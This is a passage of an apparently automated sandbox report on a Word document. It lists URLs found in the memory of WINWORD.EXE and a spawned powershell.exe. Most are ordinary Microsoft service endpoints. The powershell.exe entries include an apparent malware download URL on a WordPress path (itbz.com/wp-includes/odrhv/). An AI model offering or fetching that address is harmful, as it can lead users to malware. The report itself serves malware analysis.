Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileab
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.com
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2198755822.0000000000BA2000.00000004.00000001.sdmpString found in binary or memory: https://directory.services.
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/t
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comen
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: WINWORD.EXE, 00000000.00000002.2867813501.0000000002DD5000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android)
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Droid
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C90
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://fs.micL
Source: powershell.exe, 00000005.00000002.1956446860.000001BA0902A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester(~0
Source: powershell.exe, 00000005.00000002.1956446860.000001BA0902A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pesterxhl
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000005.00000003.1935646891.000001BA0A441000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://graph.mic
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://graph.microsofs
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1763302965.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/https://graph.ppe.windows.net
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/k
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/e
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/https://graph.windows.net
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/k
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net0
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetryatOfficeOnlineContenthttps://insertmedi
Source: WINWORD.EXE, 00000000.00000002.2867446566.0000000002CF0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetryh
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?M
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dMBI_SSL_SHORTofficeapps.live.com
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3ds
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: WINWORD.EXE, 00000000.00000002.2867446566.0000000002CF0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?3
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentImageshttps://hubbl
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnostics.office.comdUIs(l
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comeRlIx%
Source: WINWORD.EXE, 00000000.00000002.2867813501.0000000002DD5000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppHomeR
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing48
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
Source: WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtngssNLb
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookr
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
Source: WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrivesXls
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTssl.
Source: powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: https://itbz.com/wp-includes/odrhv/
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: https://itbz.com/wp-includes/odrhv/xhl
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.com
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comk
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/
Source: WINWORD.EXE, 00000000.00000003.1763236843.000000000C7BB000.00000004.00000001.sdmpString found in binary or memory: https://login.windowa
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize1L
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize2
Source: WINWORD.EXE, 00000000.00000003.1763302965.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.local
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localace
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.ne
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/c
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauh
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0Z
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0b
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize123s
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1re~
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1xt
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3WMUR
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH1
Source: WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeOfCi
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeabled
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeal
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeash
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeate
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeate4
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeatem
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeavior
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizebled
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecher
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecklen
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizector
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedM
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedd
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedh
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedty
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeed
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeeople
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefCi
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizegic
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeging
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeging3
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeging_
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeion
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeionQ
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeionb
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeiond
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel1234
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeleC
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeled
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeled#
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeled$
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeledd
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeleds
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizem
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizengUID
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizenser/
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizensgB
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizents
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeol
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeon
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizepj
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizept
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesab
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesrek
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeta
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizete2
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetor
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeure
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeureo
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizev
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizevcn
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizevcsa
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizewareP
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/2
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/BingGeospatialEndpointServiceUrlhttps://dev.virtualearth.net/REST/V1/Ge
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/t
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://messaging.office.com/
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBearer
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyName
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://ncus-000.contentsync.
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.2867813501.0000000002DD5000.00000004.00000001.sdmpString found in binary or memory: https://ncus-000.pagecontentsync.
Source: WINWORD.EXEString found in binary or memory: https://nexus.officeapps.live.com
Source: WINWORD.EXE, 00000000.00000002.2864486869.00000000004C0000.00000004.00000020.sdmpString found in binary or memory: https://nexus.officeapps.live.comd.l
Source: WINWORD.EXEString found in binary or memory: https://nexusrules.officeapps.live.com
Source: WINWORD.EXE, 00000000.00000003.1766099719.000000000C95F000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1770534835.000000000C798000.00000004.00000001.sdmpString found in binary or memory: https://nexusrules.officeapps.live.com/
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://nexusrules.officeapps.live.com/nexus/16
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://nexusrules.officeapps.live.com/nexus/rules
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://nexusrules.officeapps.live.com/nexus/rules-
Source: WINWORD.EXE, 00000000.00000003.1764631979.000000000C7F6000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.2867813501.0000000002DD5000.00000004.00000001.sdmpString found in binary or memory: https://nexusrules.officeapps.live.com/nexus/rules?Application=winword.exe&Version=16.0.11001.20108&
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://nexusrules.officeapps.live.com/nexus/rulesj
